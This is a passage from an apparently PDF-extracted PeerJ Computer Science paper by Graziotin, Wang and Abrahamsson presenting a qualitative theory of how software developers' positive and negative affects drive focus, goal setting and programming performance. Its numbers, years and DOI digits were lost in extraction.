(as in moods). even more, haybron ( ) has seen happiness as a matter of a person’s affective condition where only central affects are concerned. we see a similarity between attractors and haybron ( ) central affects. as attractors are important affects, we agree that they are a strong constituent of the happiness of the individuals. however, non attractors could be central affects, as well. in our observations, we saw that attractors are also affects that are easily externalized by the participants, and we will show that their originating events are more visible to them. furthermore, we will show that attractors are more linked to the focus and the developers’ performance. thus, we differentiate them from central affects. the participants could sometimes realize the affective meaning of attractors by themselves, as in quote . there is often the need to externalize them in order for an observer to feel them. we found that sometimes, externalizing affects is alone beneficial, as seen in the next section. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. interventions while the presence of researchers has always an influence on the participant’s behav- iors (franke & kaul, ), it happened twice that our interaction with the participants had a clear effect on their feelings and behaviors. we call such events interventions. interventions are events—as shown in fig. by the uml-like grey arrow with a white arrowhead—that mediate the intensity of already existing negative attractors, thus reducing them as much as possible to normal affects. after externalizing his depressed state in interview quote , p continued as follows: . “what we were doing was not ‘in focus.’ the result really didn’t matter to me. to my eyes, we were losing time. however, once i’ve told you what i told you [the personal issues] you know that as well. it is not that i am hiding or that i am inventing things out..i now have no more the possibility to wriggle anymore. i told you why i was not there and i am feeling better already. i am now here for two days, and i feel way better than before.”—p . the field memos provided more evidence on the effectiveness of interventions. for example, during the reconciliation, which happened at the beginning of week , the developers had frequent soft fights. p battles fiercely for his opinions and design strategies. however, he is listening to p opinions. on the other hand, p seems more interested to get stuff done, and he seems less prone to listen to p . p is probably realizing this and responds using passive-aggressive modes. some not-so-very nice words fly. p and p are less aggressive with each other. my proposal to let them express their opinions and to invite them to listen to each other seems to have a positive effect. a solution, albeit influenced by me, seems to have been reached. a field memo six days after the reconciliation was much more positive. p and p have been working with an almost stable pace. there does not seem to be an elephant in the room anymore. both of them smile often and joke with each other. you can feel them happier than before. i often see p and p showing their results to each other. the work seems way more productive than last week. even personal issues were having less impact on p as he revealed in an interview nine days after the reconciliation. . “my personal issues are having a minor impact on my productivity, despite the fact that my mind wonders in different places. it is because we are now working well together and share a vision.”—p interventions in fig. are reached by dashed arrows, which start from affects and attractors, and have a dashed arrow pointing to focus. the dashed arrows, together with the labels mediated by and amplify (or reduce) drive on, indicate alternative paths in the process. that is, affects and attractors are mediated by interventions, which amplify or reduce their drive on the focus. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. these interventions suggest that a mediator is a useful figure in a software development team. the mediator should be able to gently push the team member to let out their opinions, views, and affects. a more concrete example could be an agile coach or a team leader according to the team settings. focus—progressing and goal setting in this section, we explain the construct of focus, which is related to progressing toward goals and the setting of such goals. the focus often referred to a general mental focus, e.g., “i was in focus after i could refactor all that code using sublime text search-and-replace capacity.”—p , which usually matched a focus on the current chunk of code. however, the focus on the current chunk of code was with respect to a goal. p mentioned focus in interview quote , where he told the interviewer that he could not focus on the programming task while at home, because of the realization of being depressed. a more tangible focus on the code at hand was portrayed by p in the following interview quote. . “after our [between p and p ] reconciliation and after the meeting with [the head nurse], i often developed in full immersion. when i am in full immersion mode, nothing exists except what i am doing. i have a goal in mind and i work toward it. i don’t think about anything else but my goal and my progress towards it.”—p during the last interview, p was directly asked about the way he focuses while developing software and what he thinks about. besides the full immersion mode that p described in quote , he described a “lighter mode of immersion. i enter this mode when i am tired, when i write less functional aspects of the code.” but also “when i am interrupted by negative news or when i focus my attention more on some problems.” in quote , p shared his view on negative affects and how they hinder performance by changing the way he perceived events as attractors. . “my negative thoughts have been the same lately—more or less–but i sometimes change the way i look at them. it is often positive, but it is often negative, too. maybe i realize this more when i have a negative attitude towards them. it influences my work in a particular way: my concerns become quicksand.”—p our focus appears to be similar to the flow as depicted by csikszentmihalyi ( ), and found in the related work by meyer et al. ( ) and müller & fritz ( ), which was described as an attention state of progressing and concentration. additionally, the participants often mentioned the term ‘vision,’ which was meant as the “ability to conceive what might be attempted or achieved.” (oed online, ). for this reason, we preferred using the term goal setting. the participants linked the focus and the capacity of setting goals. goal settings has an established line of research in organizational behavior and psychology—one of the seminal works is by locke ( )—that would deserve its own space in a separate article. it involves the development of a plan, which in our case is internalized, designed to guide an individual toward a goal (clutterbuck, ). those goals found in our study were related to future achievements in the short and graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. long run, i.e., the task and the project. one example of task goals lies in the interview quote . whenever the focus of attention was on the current code melted with the goal setting of task and project, the performance was reported and observed as positive. however, if something was preventing the focus on the current code—now—and the focus on the goal or the goal setting of the task or project—then—the performance was reported and observed as negative. p summarized these reflections concisely in quote . . “it does not matter how much it is actually going well with the code, or how i actually start being focused. then it [my thoughts about my personal issues] comes back into mind. it is like a mood. i cannot define it in any way. but it is this getting rid of a thought, focusing back to work and the task goal. here [shows commit message] i wanted to add the deletion of messages in the nurses’ log. but when it happens, i lose the task vision. what was i trying to accomplish? why was i trying to do this? it happens with the project vision, too. i don’t know what i am doing anymore.”—p the project goal setting is similar to the task goal setting. the difference is that project goal setting is the capacity of perceiving the completion of a project in the future and visualizing the final product before its existence as p outlined in interview quote . . “after we talked to [the head nurse], we gathered so much information that we over- looked or just did not think about. [...] between that and the time you [the researcher] invited us to speak about our issues and mediated among our opinions, we had a new way to see how the project looked like. the product was not there still, but we could see it. it was how the final goal looked like.”—p there is a link between focusing on the code and focusing on the task goal. staying focused on the code meant staying focused on the now (and here). it is the awareness of the meaning of each written line of code towards the completion of a task. focusing on the task and project goals meant staying focused on the then (and there). it was meant as the capacity of envisioning the goal at the shorter term (the task) and the overall goal of the project. at the same time, focusing on the task and the project meant the possibility to define a task completion criteria, the awareness of the distance towards the completion of such task, and to re-define the goal during the work day. our findings are in line with those of meyer et al. ( ), where the participants in a survey perceived a productive day as a day where “they complete their tasks, achieve a planned goals or make progress on their goals” (p. ). the number of closed work items, e.g., tasks and bugs, was the most valued productivity measurement among developers. the full immersion mode mentioned by p in interview quote resembles the flow depicted by csikszentmihalyi ( ) and mentioned in the related work by meyer et al. ( ) and müller & fritz ( ). performance the performance was generally understood by the participants as their perceived effective- ness in reaching a previously set expectation or goal. or, whenever then became now. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. . “last week has been chaotic. we worked very little on the code. p played around with the programming framework. p tried to adapt an example program to fit our needs. so, p studied the chosen framework. i can say that p was productive. i spent my time doing refactoring and little enhancements of what was already there. little functionality was developed so far. in a sense, we still performed well. we did what we were expecting to do. even if i did so little. i still laid down the basis for working on future aspects. so yeah, i am satisfied.”—p . interviewer: “what happened during this week?” p : “well, it happened that..i did not behave correctly in this week. i could not do a single commit.” we observed that the affects have an impact on the programming performance of the developers. this is achieved by driving the focus that developers have on the currently focused code, the ongoing task, or the project itself. p suggested already, in interview the aim of this study is to offer a theory of the impact of affects on performance while programming rather than proposing a performance or productivity theory. a plethora of factors influence the performance of developers—see wagner & ruhe ( ); sampaio et al. ( ) for a compre- hensive review of the factors—and affects are one of them, although they are not yet part of any review paper. at the same time, software development performance is composed of several complex interrelated constructs— see petersen ( ) for a review of productivity measurements—to which we add those driven by cognitive processes and also influenced by affects, e.g., creativity and analytic problem solving capability (graziotin, wang & abrahamsson, a). quote , that the excitement caused by the discovery of the useful search-and-replace functionalities in his editor had pervaded his work day. this positive attractor caused him to be productive also when not using such functionalities. p could also offer cases of the opposite side, like the one in quote . . “i was lost in my own issues. my desire to do stuff was vanishing because i felt very depressed. there was not point in what i was currently doing, to the point that i could not realize what i had to do.”—p more precisely, positive affects have a positive impact on the programming performance—as they drive the focus positively—while negative affects have a negative impact on the programming performance—as they drive the focus negatively. while most of the previous quotes are examples on the negative side, quote and the following quote are instances of the positive case. . p : “i now feel supported and accompanied by p . we are a proper team.” interviewer: “what has changed?” p : “it’s that now p is active in the project. before [the reconcilia- tion] p was not here at all. [. . . ] if he joined after our meeting with [the head nurse], there was the risk to see him as an impediment instead of a valid resource and team member. now, i feel happier and more satisfied. we are working very well together and i am actually more focused and productive.” a positive focus has a positive effect on programming performance. but, a focus on the code toward a task or project goals (or a combination of them) have an even stronger positive impact on the programming performance. we provide some codes related to the consequences of positive and negative affects (respectively) while programming. ‘limiting the switch to personal issues because of feeling accompanied by a team member,’ ‘switching focus between the task and the positive feelings caused by a tool makes productive,’ ‘focusing better on code because of the positive feelings brought by reconciliation,’ ‘focusing graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. less on personal issues [more on the code] because of a sense of being wanted at work,’ ‘focus- ing more on code because of feeling supported and in company,’ ‘committing code frequently if feeling in company of people.’ ‘abandoning work because of negative feelings fostered by negative events,’ ‘avoiding coming to work because of lost vision [and depression],’ ‘avoiding committing working code during day because of loneliness,’ ‘choosing an own path because of the loneliness,’ ‘switching focus between personal issues and work-related task prevents solving programming tasks,’ ‘losing focus often when feeling alone,’ ‘losing the project vision because of quicksanding in negative affects,’ ‘not reacting to team member input because of bad mood,’ ‘realizing the impediments brought by personal issues when they are the focus of attention,’ ‘trying to self-regulate affects related to negative events and thoughts lowers performance,’ ‘un- derestimating an achievement because of loneliness,’ ‘worrying continuously about life achievements and avoiding work.’ comparison of the theory with related work the proposed theory can be seen as a specialized version of affective events theory (aet, (weiss & cropanzano, )). it provides an affect-driven theory explaining how events, both work-related and not, impact the performance of developers through their focus and goal setting while programming. therefore, our study produces evidence that aet is an effective macrostructure to guide research of affects on the job in the context of software development. at the same time, our proposed theory is reinforced by the existence of aet itself. we also note that our theory is partially supported in müller & fritz ( ) independent study—built upon one of our previous studies (graziotin, wang & abrahamsson, a)—which was conducted at about the same time of the present study. among furthermore, at our submission time the work by müller & fritz ( ) had just been publicly accepted for inclusion in icse proceedings, but it is currently still not published formally. we obtained their work through an institutional repository of preprints. their findings, the self-assessed progressing with the task is correlated with the affects of developers; the most negative affects were correlated with less focus on clear goal settings and positive affects were linked with focusing and progressing toward the set goals. finally, our findings are in line with the general findings of goal settings research. that is, the task performance is positively influenced by shared, non conflicting goals, provided that there are fair individuals’ skills (locke & latham, ). happy, therefore productive or productive, therefore happy? let us now reason a little on the causality aspects between affects and performance. we note that the participants have always explicitly stated or suggested that the influence of affects on performance is of a causality type. some researchers have warned us that there might instead be a correlation between the constructs, as well as a double causality (i am more productive because i am more happy, and i am more happy because i am more produc- tive). indeed, so far in our previous studies (graziotin, wang & abrahamsson, a; grazi- otin, wang & abrahamsson, a) we have argued for correlation, not causation. in the present study, we could not find support in the data for a double causation, but for a causality chain happy, therefore productive, in line also with related research graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. (wrobel, ). however, it seems reasonable that we are happier if we realize our positive performance. we speculate here that a third, mediating option might exist. in the proposed theory, and in several other theories in psychology, being happy is reduced to frequent feeling of positive affects (haybron, ). as argued by haybron ( ), the centrality of affects might be relevant, as well. haybron ( ) stated, as an example, that the pleasure of eating a cracker is not enduring and probably not affecting happiness; therefore, it is considered a peripheral affect. peripheral affects arguably have smaller—if not unnoticeable—effects on cognitive activities. it might be the case that the positive (negative) affects triggered by being productive (unproductive) do exist but have a small to unnoticeable effect on future productivity. however, this is outside the scope of this study. we report our backed up speculation as causation for future work. conclusion in this qualitative, interpretive study, we constructed a theory of the impact of affects on software developers with respect to their programming performance. as far as we know, this is the first study to observe and theorize a development process from the point of view of the affects of software developers. by echoing a call for theory building studies in software engineering, we offer first building blocks on the affects of software developers. for this reason, we designed our theory development study using a small sample adhering to guidelines for generating novel theories, thus enabling the development of an in-depth understanding of an otherwise too complex and complicated set of constructs. the theory conceptualization portraits how the entities of events, attractors, affects, focus, goal settings, and performance interact with each other. in particular, we theorized a causal chain between the events and the programming performance, through affects or attractors. positive affects (negative affects) have a positive (negative) impact on the programming task performance by acting on the focus on code, and task and project goals. the theory introduces the concept of attractors, which are affects that earn importance and priority to a developer’s cognitive system and, often, to their conscious experience. attractors have an even higher impact on programming performance than ordinary affects. finally, we also provided evidence that fostering positive affects among developers boosts their performance and that the role of a mediator bringing reconciliations among the team members might be necessary for successful projects. contributions and implications our study offers multiple contributions and implications. the theoretical contributions lie in the theory itself. the theory incorporates the impact of affects on performance through an influence on the focus of developer’s consciousness on coding and on several aspects of goal settings (task, project). in addition, we introduced the concept of attractors for developers, which is a novel construct based on affects and events at different spheres (work-related and not, private or public). the theory is proposed as part of basic science of software engineering, and it is open to falsification and extension. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. as stated by lewin, “there is nothing quite so practical as a good theory” (lewin, ). the practical implication of our study is that, despite the idea among managers that pressure and some negative feelings help in getting the best results out, there is growing evidence that fostering (hindering) positive (negative) affects of software developers has a positive effect on the focus on code, and task and project goal settings, and, consequently, on their performance. additionally, we found evidence that a mediator role to reconcile the developers’ issues and conflicts is a way to foster positive affects and mediate negative attractors among them. the proposed theory can be employed as a guideline to understand the affective dynamics in a software development process. the theory can be used to foster a better environment in a software development team and to guide managers and team leaders to enrich their performance by making the developers feel better. on the other hand, our conceptualized theory can guide the team leaders to understand the dynamics of negative performance when it is linked to negative affects. limitations the most significant limitation of this research to be mentioned lies in its sample. although it is very common for software engineering studies to recruit computer science students as participants to studies (salman, misirli & juristo, ), for some readers this might still be considered a limitation. first, it is true that our participants were enrolled to a bsc study in computer science, but they both had a working history as freelancers in companies developing websites and web applications. while our developers did not have to be concerned about assets and salaries, they were paid in credit points and a final award in terms of a bsc thesis project. tichy ( ) and kitchenham et al. ( ) argued that students are the next generation of software professionals as they are close to the interested population of workers, if not even more updated on new technologies. indeed, the empirical studies comparing students in working settings with professionals did not find evidence for a difference between the groups (svahnberg, aurum & wohlin, ; berander, ; runeson, ; höst, regnell & wohlin, ; salman, misirli & juristo, ). the conclusions from the previous studies are that students are indeed representatives of professionals in software engineering studies. the non-inclusion of female participants might be considered a further limitation of this study. there is a widespread popular conception that there are gender differences in emotionality (mcrae et al., ). evidence has been found for gender differences at the neural level associated to reappraisal, emotional responding and reward processing (mcrae et al., ), and for a female having greater reactivity to negative stimuli (gardener et al., ) and adoption of different emotion regulation strategies (nolen-hoeksema & aldao, ). while more studies on gender differences are needed as the produced evidence is not enough yet (nolen-hoeksema, ), it might be the case that the inclusion of a female developer would have made the dataset richer, and perhaps would have led to a more gender-balanced theory. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. while we argued extensively about the choice of the sample size in section theory construction and representation, we repeat here that there was the need to keep the phenomenon under study as simple as possible given its complex nature (barsade & gibson, ). furthermore, when novel theories are to be developed in new domains, such as software engineering, a small sample should be considered (järvinen, ). this strategy, while sometimes seen as limiting, pays off especially for setting out basic building blocks (weick, ). as argued by bendassolli ( ), even one observation could be sufficient for theorizing as so far as “phenomena should be directly explained by theory, and only indirectly supported by the data” (quoted from section . ). our choice of the small sample size was seen as a benefit for the purposes of this explanatory investigation. the reason is that in a real company, the source of events is vast and complex. there are team dynamics with complicated, and even historical, reasons that are harder to grasp—triggering a complex, powerful network of affects (barsade & gibson, )—thus lifting the study’s focus out from the programming itself. future work we have three directions of research to suggest to the readers. the first one is an immediate continuation of our study. as our study was explanatory, we suggest future research to test the proposed theory and to quantify the relationships in quantitative studies, in software engineering field but also in other domains to understand if and how the specifics particular to the software engineering context affect the applicability of our theory. although quantifying the impact of attractors was beyond the scope of this study, we feel that negative attractors triggered by non work-related events and positive attractors triggered by work-related events have the strongest impact on the performance of software developers. furthermore, this study focused on the dimensions of positive and negative affects. it is expected that different types of affects and attractors matter more than other, and have different impact on the focus and performance. we leave future studies the option to study discrete affects, e.g., joy, anger, fear, frustration, or different affect dimensions, e.g., valence, arousal, and dominance. our second suggestion for future studies is to focus on dynamic, episodic process models of affects and performance where time is taken into consideration. the underlying affects of developers change rapidly during a workday. the constituents and the effects of such changes should be explored. additionally, exploring the dynamics of affects turning into attractors (and possibly vice-versa) and what causes such changes will provide a further understanding of the effectiveness of interventions and making developers feeling happier, thus more productive. finally, our third direction for future research is to broaden the focus on ( ) artifacts different than code, such as requirements and design artifacts, and ( ) understanding the complex relationship of affects and software developers’ motivation, commitment, job satisfaction, and well-being. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. acknowledgements we thank our two participants, who openly, actively, and unhesitatingly collaborated during the research activities. we are grateful for the feedback provided by two anonymous reviewers, which let us improve the manuscript in terms of several aspects including clarity. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • daniel graziotin conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • xiaofeng wang performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • pekka abrahamsson analyzed the data, wrote the paper, reviewed drafts of the paper. references abrahamsson p. . rethinking the concept of commitment in software process improvement. scandinavian journal of information systems ( ): – . amabile t. . creativity and innovation in organizations. in: harvard business school background, pages note – . amabile t, barsade sg, mueller js, staw bm. . affect and creativity at work. administrative science quarterly ( ): – doi . /asqu. . . . . barsade sg, gibson de. . group emotion: a view from top and bottom. research on managing groups and teams ( ): – . barsade sg, gibson de. . why does affect matter in organizations? academy of management perspectives ( ): – doi . /amp. . . beal dj, weiss hm, barros e, macdermid sm. . an episodic process model of affective influences on performance. the journal of applied psychology ( ): – doi . / - . . . . beedie c, terry p, lane a. . distinctions between emotion and mood. cognition & emotion ( ): – doi . / . bendassolli pf. . theory building in qualitative research: reconsidering the problem of induction. forum qualitative sozialforschung/forum: qualitative social research ( ): part i. berander p. . using students as subjects in requirements prioritization. in: proceedings international symposium on empirical software engineering (isese ). piscataway: ieee, – . graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /asqu. . . . http://dx.doi.org/ . /amp. . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. bradley mm, lang pj. . measuring emotion: the self-assessment manikin and the semantic differential. journal of behavior therapy and experimental psychiatry ( ): – doi . / - ( ) - . brief ap, weiss hm. . organizational behavior: affect in the workplace. annual review of psychology : – doi . /annurev.psych. . . . charmaz k. . constructing grounded theory: a practical guide through qualitative analysis. introducing qualitative methods, st edition, vol. . london: sage publications. ciborra c. . the labyrinths of information: challenging the wisdom of systems. st edition. new york: oxford university press. clutterbuck d. . coaching reflection: the liberated coach. coaching: an international journal of theory, research and practice ( ): – doi . / . corbin jm, strauss al. . basics of qualitative research: techniques and procedures for developing grounded theory. rd edition, vol. . london: sage publications. creswell jw. . research design: qualitative, quantitative, and mixed method approaches. rd edition, vol. . thousand oaks: sage publications. csikszentmihalyi m. . finding flow: the psychology of engagement with everyday life. st edition, vol. . new york: basic books. de dreu ckw, nijstad ba, bechtoldt mn, baas m. . group creativity and innovation: a motivated information processing perspective. psychology of aesthetics, creativity, and the arts ( ): – doi . /a . diener e, wirtz d, tov w, kim-prieto c, choi d, oishi s, biswas-diener r. . new well-being measures: short scales to assess flourishing and positive and negative feelings. social indicators research ( ): – doi . /s - - -y. easterbrook s, singer j, storey m-a, damian d. . selecting empirical methods for software engineering research. in: shull f, singer j, sjøberg dik, eds. guide to advanced empirical software engineering. london: springer-verlag, – doi . / - - - - . eisenhardt k. . building theories from case study research. academy of management review ( ): – . fagerholm f, ikonen m, kettunen p, münch j, roto v, abrahamsson p. . performance alignment work: how software developers experience the continuous adaptation of team performance in lean and agile environments. information and software technology : – doi . /j.infsof. . . . feldt r, angelis l, torkar r, samuelsson m. . links between the personalities, views and attitudes of software engineers. information and software technology ( ): – doi . /j.infsof. . . . feldt r, torkar r, angelis l, samuelsson m. . towards individualized software engineering. in: proceedings of the international workshop on cooperative and human aspects of software engineering (chase ’ ). new york: acm press, – . fischer g. . cognitive view of reuse and redesign. ieee software ( ): – doi . /ms. . . fisher cd. . mood and emotions while working: missing pieces of job satisfaction? journal of organizational behavior ( ): – doi . /(sici) - ( ) : < ::aid-job > . .co; -m. fisher cd, ashkanasy nm. . the emerging role of emotions in work life: an introduction. journal of organizational behavior ( ): – doi . /(sici) - ( ) : < ::aid-job > . .co; - . graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /annurev.psych. . . http://dx.doi.org/ . / http://dx.doi.org/ . /a http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-job % e . .co; -m http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-job % e . .co; - http://dx.doi.org/ . /peerj-cs. flores f. . information technology and the institution of identity. information technology & people ( ): – doi . / . franke rh, kaul jd. . the hawthorne experiments: first statistical interpretation. american sociological review ( ): – doi . / . gardener ekt, carr ar, macgregor a, felmingham kl. . sex differences and emotion regulation: an event-related potential study. plos one ( ):e doi . /journal.pone. . geertz c. . the interpretation of cultures: selected essays. vol. . new york: basic books. glaser bg. . theoretical sensitivity: advances in the methodology of grounded theory. mill valley: the sociology press. glaser bg, strauss al. . the discovery of grounded theory: strategies for qualitative research. chicago: aldine. graziotin d, wang x, abrahamsson p. a. happy software developers solve problems better: psychological measurements in empirical software engineering. peerj ( ):e doi . /peerj. . graziotin d, wang x, abrahamsson p. b. software developers, moods, emotions, and performance. ieee software ( ): – doi . /ms. . . graziotin d, wang x, abrahamsson p. a. do feelings matter? on the correlation of affects and the self-assessed productivity in software engineering. journal of software: evolution and process ( ): – doi . /smr. . graziotin d, wang x, abrahamsson p. b. the affect of software developers: common misconceptions and measurements. in: ieee/acm th international workshop on cooperative and human aspects of software engineering, firenze, italy. piscataway: ieee computer society, – doi . /chase. . . graziotin d, wang x, abrahamsson p. c. understanding the affect of developers: theoretical background and guidelines for psychoempirical software engineering. in: th international workshop on social software engineering (sse ), bergamo, italy. available at http://arxiv.org/ abs/ . . gregor s. . the nature of theory in information systems. mis quarterly ( ): – . harris ad, mcgregor jc, perencevich en, furuno jp, zhu j, peterson de, finkelstein j. . the use and interpretation of quasi-experimental studies in medical informatics. journal of the american medical informatics association ( ): – doi . /jamia.m . haybron dm. . happiness and pleasure. philosophy and phenomenological research ( ): – doi . /j. - . .tb .x. haybron dm. . on being happy or unhappy. philosophy and phenomenological research ( ): – doi . /j. - . .tb .x. haybron dm. . do we know how happy we are? on some limits of affective introspection and recall. nous ( ): – doi . /j. - . . .x. heath h, cowley s. . developing a grounded theory approach: a comparison of glaser and strauss. international journal of nursing studies ( ): – doi . /s - ( ) - . höst m, regnell b, wohlin c. . using students as subjects—a comparative study of students and professionals in lead-time impact assessment. empirical software engineering ( ): – doi . /a: . järvinen p. . on research methods. st edition. tampere: opinpajan kirja. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /smr. http://dx.doi.org/ . /chase. . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /jamia.m http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. johnson p, ekstedt m, jacobson i. . where’s the theory for software engineering? ieee software ( ): – doi . /ms. . . kasurinen j, laine r, smolander k. . how applicable is iso/iec in game software development? in: heidrich j, oivo m, jedlitschka a, baldassarre mt, eds. th international conference on product-focused software process improvement (profes ), lecture notes in computer science, vol. . berlin heidelberg: springer, – . khan ia, brinkman w, hierons rm. . do moods affect programmers’ debug performance? cognition, technology & work ( ): – doi . /s - - - . kitchenham ba, pfleeger sl, pickard lm, jones pw, hoaglin dc, emam ke, rosenberg j. . preliminary guidelines for empirical research in software engineering. ieee transactions on software engineering ( ): – doi . /tse. . . klein hk, myers md. . a set of principles for conducting and evaluating interpretive field studies in information systems. mis quarterly : – doi . / . kleinginna pr, kleinginna am. . a categorized list of emotion definitions, with suggestions for a consensual definition. motivation and emotion : – doi . /bf . langley a. . strategies for theorizing from process data. the academy of management review ( ): – doi . / . lenberg p, feldt r, wallgren l-g. . towards a behavioral software engineering. in: proceedings of the th international workshop on cooperative and human aspects of software engineering (chase ). new york: acm press, – . lenberg p, feldt r, wallgren lg. . behavioral software engineering: a definition and system- atic literature review. journal of systems and software : – doi . /j.jss. . . . lesiuk t. . the effect of music listening on work performance. psychology of music ( ): – doi . / . lewin k. . the research center for group dynamics at massachusetts institute of technology. sociometry ( ): – doi . / . locke ea. . toward a theory of task motivation and incentives. organizational behavior and human performance ( ): – doi . / - ( ) - . locke ea, latham gp. . new directions in goal-setting theory. current directions in psychological science : – doi . /j. - . . .x. lyubomirsky s, king l, diener e. . the benefits of frequent positive affect: does happiness lead to success? psychological bulletin ( ): – doi . / - . . . . mcrae k, ochsner kn, mauss ib, gabrieli jjd, gross jj. . gender differences in emotion regulation: an fmri study of cognitive reappraisal. group processes & intergroup relations ( ): – doi . / . meyer an, fritz t, murphy gc, zimmermann t. . software developers’ perceptions of productivity. in: proceedings of the nd acm sigsoft international symposium on foundations of software engineering (fse ). new york: acm press, – doi . / . . miner ag, glomb tm. . state mood, task performance, and behavior at work: a within-persons approach. organizational behavior and human decision processes ( ): – doi . /j.obhdp. . . . mohr lb. . explaining organizational behavior. san francisco: jossey-bass inc. muchinsky pm. . emotions in the workplace: the neglect of organizational behavior. journal of organizational behavior ( ): – doi . / - ( ) : < ::aid-job > . .co; -a. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / http://dx.doi.org/ . /bf http://dx.doi.org/ . / http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /j.obhdp. . . http://dx.doi.org/ . / - ( ) : % c ::aid-job % e . .co; -a http://dx.doi.org/ . /peerj-cs. müller sc, fritz t. . stuck and frustrated or in flow and happy: sensing developers’ emotions and progress. in: ieee/acm th ieee international conference on software engineering. florence, italy. piscataway: ieee, – doi . /icse. . . nolen-hoeksema s. . emotion regulation and psychopathology: the role of gender. annual review of clinical psychology ( ): – doi . /annurev-clinpsy- - . nolen-hoeksema s, aldao a. . gender and age differences in emotion regulation strategies and their relationship to depressive symptoms. personality and individual differences ( ): – doi . /j.paid. . . . oed online. . vision, n. oxford: oxford university press. available at http://www.oed.com/ view/entry/ . ortony a, clore gl, collins a. . the cognitive structure of emotions. st edition. new york: cambridge university press. osterweil l, ghezzi c, kramer j, wolf a. . determining the impact of software engineering research on practice. computer (march): – doi . /mc. . . parkinson b, briner r, reynolds s, totterdell p. . changing moods: the psychology of mood and mood regulation. st edition. london: addison-wesley longman. petersen k. . measuring and predicting software productivity: a systematic map and review. information and software technology ( ): – doi . /j.infsof. . . . pfeffer j. . reviewed work: explaining organizational behavior. by lawrence b. mohr. administrative science quarterly ( ): doi . / . plutchik r, kellerman h. . emotion, theory, research, and experience. vol. . london: academic press. rindova v. . editor’s comments: publishing theory when you are new to the game. academy of management review ( ): – doi . /amr. . . runeson p. . using students as experiment subjects an analysis on graduate and freshmen student data. in: proceedings th international conference on empirical assessment & evaluation in software engineering, – . russell ja. . culture and the categorization of emotions. psychological bulletin ( ): – doi . / - . . . . russell ja. . core affect and the psychological construction of emotion. psychological review ( ): – doi . / - x. . . . russell ja. . emotion, core affect, and psychological construction. cognition & emotion ( ): – doi . / . russell ja, barrett lf. . core affect, prototypical emotional episodes, and other things called emotion: dissecting the elephant. journal of personality and social psychology ( ): – doi . / - . . . . salman i, misirli at, juristo n. . are students representatives of professionals in software engineering experiments? in: ieee/acm th ieee international conference on software engineering. florence, italy. piscataway: ieee, – doi . /icse. . . sampaio scdb, barros ea, aquino jr gs, silva mjc, meira srdl. . a review of productivity factors and strategies on software development. in: fifth international conference on software engineering advances, – . schwarz n. . feelings as information: informational and motivational functions of affective states. in: higgins et, sorrentino rm, eds. handbook of motivation and cognition: foundations of social behavior, vol. . new york: guilford press, – , chapter . graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ 